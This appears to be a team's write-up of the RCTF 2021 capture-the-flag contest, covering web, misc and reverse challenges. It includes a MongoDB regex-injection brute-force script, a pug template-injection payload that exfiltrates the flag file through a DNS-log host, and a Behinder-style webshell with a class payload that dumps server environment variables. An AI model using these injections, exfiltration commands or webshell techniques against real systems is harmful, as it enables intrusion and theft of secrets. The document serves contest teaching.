RCTF-2021 部分WriteUp
RCTF-2021 部分WriteUp
Timeline Sec
发布于 2021-10-08 17:40:27
发布于 2021-10-08 17:40:27
RCTF2021
本次比赛Misc方向所有题目由魔法少女雪殇全部解出!其他方向仍有很大提升空间,尤其是PWN和密码学,如果你的方向恰好是这两个方向中的,同时也想有个团队一起战斗,那不妨来试试!公众号后台回复“加入团队”获取加入方式,期待与你一起并肩作战!
Web
★candyshop
Mongodb注入rabbit的密码,只有rabbit能够使用order功能 注入payload:
username=rabbit&password[$regex]=^3写脚本:
import requests
import time
sess=requests.Session()
url='http://127.0.0.1:3000/user/login'
url='http://123.60.21.23:23333/user/login'
f='Login Failed!' # 错误时网页包含内容
y='You Bad Bad' # 正确时网页包含内容
start=0 # 字符串的开始字符位置
strlen=80 # 待爆破字符串的长度
sleep_time=0
ostr=''
word_li=list(range(48,58))+list(range(97,123))
# str2find='(select `2` from (select 1,2 union select * from user)a limit 1,1)'
for j in range(start,start+strlen):
for i in word_li:#小写字母、数字
time.sleep(sleep_time)
payload="^({})".format(ostr+chr(i)) # 注入语句
# print(payload)
# data数据包的构造
data={
'username':'rabbit',
'password[$regex]':payload
}
sess.get(url)
res=sess.post(url,data=data)
res.encoding=res.apparent_encoding # 中文编码
text=res.text
if(f in text):
# print(1)
continue
elif(y in text):
ostr+=chr(i)
print(ostr,j)
break
else: # 即非正也非负的异常情况
print('error:',text)
print(payload)
exit()
break
print(ostr)使用注入出的密码登录rabbit账号,在order处存在一个pug的模板注入:
需要注意的是,pug模板对格式有一定的限制,经过一番调整后,能够成功执行命令,但无回显
最后通过ceye的dnslog得到flag:
username=' readonly) %0a %23{console.log(global.process.mainModule.constructor._load("child_process").execSync("ping `cat /flag`.xxx.ceye.io").toString())} // &candyname=bunny_candy&address=1Misc
★welcome_to_rctf
just go ROIS
http://www.snowywar.top/wp-content/themes/zibll/go.php?url=aHR0cHM6Ly9yb2lzLmlvLw==
★CheckIn
little wired,when you post issuse, then actions will work
you can see,your issues, is on there.the flag always ***,
This means that when I enter the correct five-digit number, it will be replaced with ***, and then just find someone else’s actions.
i find it
the flag is 52079,solved!
★coolcat
open the link,i saw,visit/getImage
wow,cool pic
in /upload,i upload a pic then i get wired pic
So let’s take a look at the code
def ACM(img, p, q, m):
counter = 0
if img.mode == "P":
img = img.convert("RGB")
assert img.size[0] == img.size[1]
while counter < m:
dim = width, height = img.size
with Image.new(img.mode, dim) as canvas:
for x in range(width):
for y in range(height):
nx = (x + y * p) % width
ny = (x * q + y * (p * q + 1)) % height
canvas.putpixel((nx, ny), img.getpixel((x, y)))
img = canvas
counter += 1
return canvas
# My image was encrypted by ACM , but I lost the p ,q and m ......
I dont know about p and q and m,but i can confirm,the m is random.
So, I made a special picture to certify my idea,The /getImage pic size is 600×600,so do i.
from PIL import Image
with Image.new('RGB',(600,600),(0,0,0)) as pic:
pic.putpixel((0,1),(255,255,255))
pic.save('C:/Users/Snowywar/Desktop/e99aa4e9b7fc4ed5a74a590a63b131e6/1.jpg')
pic.show()i got this pic
upload,then I got a variety of different results. Since the number of m is random, then there must be a situation where m=1, and the values of p and q can be directly calculated. And I conducted a test. m (the number of runs), more run then points obtained will be farther away from the original points.
After many tests, I got the closest point
use photoshop,i got this coordinate,(66,66)
But I still need /getImage when m=1, and continue to test many times.
finally,I got this one
using my py, i can get flag.
from PIL import Image
img = Image.open('./tes1.jpg')
if img.mode == "P":
img = img.convert("RGB")
assert img.size[0] == img.size[1]
dim = width, height = img.size
p= 66
q= 66
with Image.new(img.mode, dim) as canvas:
for nx in range(width):
for ny in range(height):
y = (ny-nx*q)%600
x = (nx-y*p)%height
canvas.putpixel((x, y), img.getpixel((nx, ny)))
canvas.show()
It is wasnt rabbit?
★Monopoly
a game,need 10 million win the game.
The game of luck does not even require reverse analysis of the program.
When you choose hard mode, it will let you enter seed, which determines your next steps and behavior
When I was playing here again, I found that press 4 to return to the difficulty selection, and then press 3 to return to the difficulty mode. He will let you enter a new seed, but the amount of money remains the same. Maybe this is a bug.
At the same time, the number of steps in the first step of different seeds is also fixed, indicating that it is pseudo-random.
this is my seed and test.
I found that when the seed is 22, the amount of money will be triggered to double, and I wrote a looping script to get the flag
from pwn import *
import re
import time
p=remote("123.60.25.24",20031)
context.log_level="debug"
p.recvuntil('your name?\n')
p.sendline('haha')
p.recvuntil('want play\n')
p.sendline('3')
p.recvuntil('win the game!\n')
p.sendline('22')
for i in range(999999):
#money = p.recvline('your money')
#if p.recvuntil('RCTF'):
# print(p.recvuntil('RCTF'))
p.recvuntil('want play\n')
p.sendline('4')
p.recvuntil('want play\n')
p.sendline('3')
p.recvuntil('win the game!\n')
p.sendline('22')
p.recvuntil('want play\n')
p.sendline('4')
p.recvuntil('want play\n')
p.sendline('3')
p.recvuntil('win the game!\n')
p.sendline('22')
★ezshell
Is really misc? I dont think so.
Download the war package
protected void service(HttpServletRequest request, HttpServletResponse response) {
try {
String k;
if (request.getMethod().equals("POST")) {
response.getWriter().write("post");
k = "e45e329feb5d925b";
HttpSession session = request.getSession(); //Generate session, the next line is also
session.putValue("u", k);
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
byte[] evilClassBytes = (new BASE64Decoder()).decodeBuffer(request.getReader().readLine()); //Read the content of the post request package
class U extends ClassLoader { //Override the class loader so that it can load any malicious class U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
Class evilClass = (new U(this.getClass().getClassLoader())).g(c.doFinal(evilClassBytes)); //Decrypt the post data packet basedecode and then AES
Object a = evilClass.newInstance();
Method b = evilClass.getMethod("e", Object.class, Object.class);
b.invoke(a, request, response);
} else {
//download war
} catch (Exception var10) {
}
}so,Write a malicious class and let him call it
payload.java
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.util.*;
public class payload{
public void e(Object req, Object res) throws IOException, InterruptedException {
HttpServletRequest req1 = (HttpServletRequest)req;
HttpServletResponse res1 = (HttpServletResponse)res;
StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>Environment variable:</font><br/>");
Map<String, String> env = System.getenv();
Iterator var7 = env.keySet().iterator();
while(var7.hasNext()) {
String name = (String)var7.next();
basicInfo.append(name + "=" + (String)env.get(name) + "<br/>");
}
basicInfo.append("<br/><font size=2 color=red>JRE System properties:</font><br/>");
Properties props = System.getProperties();
Set<Map.Entry<Object, Object>> entrySet = props.entrySet();
Iterator var9 = entrySet.iterator();
while(var9.hasNext()) {
Map.Entry<Object, Object> entry = (Map.Entry)var9.next();
basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
}
String currentPath = (new File("")).getAbsolutePath();
String driveList = "";
File[] roots = File.listRoots();
File[] var14 = roots;
int var13 = roots.length;
for(int var12 = 0; var12 < var13; ++var12) {
File f = var14[var12];
driveList = driveList + f.getPath() + ";";
}
String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
Map<String, String> entity = new HashMap();
res1.getWriter().write(basicInfo.toString()+"<br>");
res1.getWriter().write(currentPath+"<br>");
res1.getWriter().write(driveList+"<br>");
res1.getWriter().write(osInfo+"<br>");
}
}But its not work.I saw the hint.
i know.
BehinderV2.0 unpack it to locate the equals function
public boolean equals(Object obj) {
PageContext page = (PageContext)obj;
page.getResponse().setCharacterEncoding("UTF-8");
String result = "";
try {
StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>Environment variable:</font><br/>");
Map<String, String> env = System.getenv();
Iterator var7 = env.keySet().iterator();
while(var7.hasNext()) {
String name = (String)var7.next();
basicInfo.append(name + "=" + (String)env.get(name) + "<br/>");
}
basicInfo.append("<br/><font size=2 color=red>JRE System properties:</font><br/>");
Properties props = System.getProperties();
Set<Entry<Object, Object>> entrySet = props.entrySet();
Iterator var9 = entrySet.iterator();
while(var9.hasNext()) {
Entry<Object, Object> entry = (Entry)var9.next();
basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
}
String currentPath = (new File("")).getAbsolutePath();
String driveList = "";
File[] roots = File.listRoots();
File[] var14 = roots;
int var13 = roots.length;
for(int var12 = 0; var12 < var13; ++var12) {
File f = var14[var12];
driveList = driveList + f.getPath() + ";";
}
String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
Map<String, String> entity = new HashMap();
entity.put("basicInfo", basicInfo.toString());
entity.put("currentPath", currentPath);
entity.put("driveList", driveList);
entity.put("osInfo", osInfo);
result = this.buildJson(entity, true);
String key = page.getSession().getAttribute("u").toString();
ServletOutputStream so = page.getResponse().getOutputStream();
so.write(Encrypt(result.getBytes(), key));
so.flush();
so.close();
page.getOut().clear();
} catch (Exception var15) {
var15.printStackTrace();
}
return true;
}Isn’t this just outputting environment variables?
Generate base64 payload data
exp
import com.sun.xml.internal.messaging.saaj.util.Base64;
import org.junit.jupiter.api.Test;
import sun.misc.BASE64Decoder;
import sun.misc.BASE64Encoder;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;
import java.util.Enumeration;
public class test1 extends HttpServlet {
@Test
public void test() throws IOException, NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException {
String k = "e45e329feb5d925b";
Cipher c = Cipher.getInstance("AES");
c.init(1, new SecretKeySpec(k.getBytes(), "AES"));
FileInputStream fileInputStream = new FileInputStream(new File("payload.class"));
int n = 0 ;
//i dont know how to wirte auto length,so I measured it manually
byte[] buffer = new byte[3525];
n = fileInputStream.read(buffer);
System.out.println(n);
System.out.println(Arrays.toString(buffer));
byte[] bytes = c.doFinal(buffer);
System.out.println(Arrays.toString(bytes));
String s = (new BASE64Encoder()).encodeBuffer(bytes);
System.out.println(s);
}
}Note that the bytes length must be accurate
POST
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释
* POST /shell HTTP/1.1<br>Host: 124.70.137.88:60080<br>Content-Length: 4716<br>Cache-Control: max-age=0<br>Upgrade-Insecure-Requests: 1<br>Origin: http://124.70.137.88:60080<br>Content-Type: application/x-www-form-urlencoded<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br>Referer: http://124.70.137.88:60080/shell<br>Accept-Encoding: gzip, deflate<br>Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-CN;q=0.7,zh;q=0.6<br>Cookie: JSESSIONID=EDF504EDA8DBEE209AEC526FCAADD8DC<br>Connection: close<br><br>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
*/back...<br><br/><br>TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download&filename=tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc https://www-us.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc https://www.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc<br><br/><br>ffl4444gg=RCTF{e2zzzz5h333ll_sooo_ez}<br><br/><br>JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre<br><br/><br>...Reverse
★Hi!Harmony! Ghidra打开
查找字符串 得到这一段
解密脚本
num1 = [0x48,0x41,0x52,0x4d,
0x4f,0x4e,0x59,0x44,
0x52,0x45,0x41,0x4d,
0x49,0x54,0x50,0x4f,
0x53,0x53,0x49,0x42,
0x4c,0x45
]
num2=[0x0,0x41,0x42,0x43,0x44,
0x45,0x46,0x47,0x48,
0x49,0x4a,0x4b,0x4c,
0x4d,0x4e,0x4f,0x50,
0x51,0x52,0x53,0x54,
0x55,0x56,0x57,0x58,
0x59,0x5a
]
for i in range(22):
if num1[i] + 3 < 0x5b:
num1[i] = num1[i] +3
else:
num1[i] = num2[(num1[i] - 0x57)%0x1a]
for x in num1:
print(chr(x),end="")KDUPRQBGUHDPLWSRVVLEOH
欢迎真正热爱技术的你!
Timeline Sec 团队
安全路上,与你并肩前行
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-09-15,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录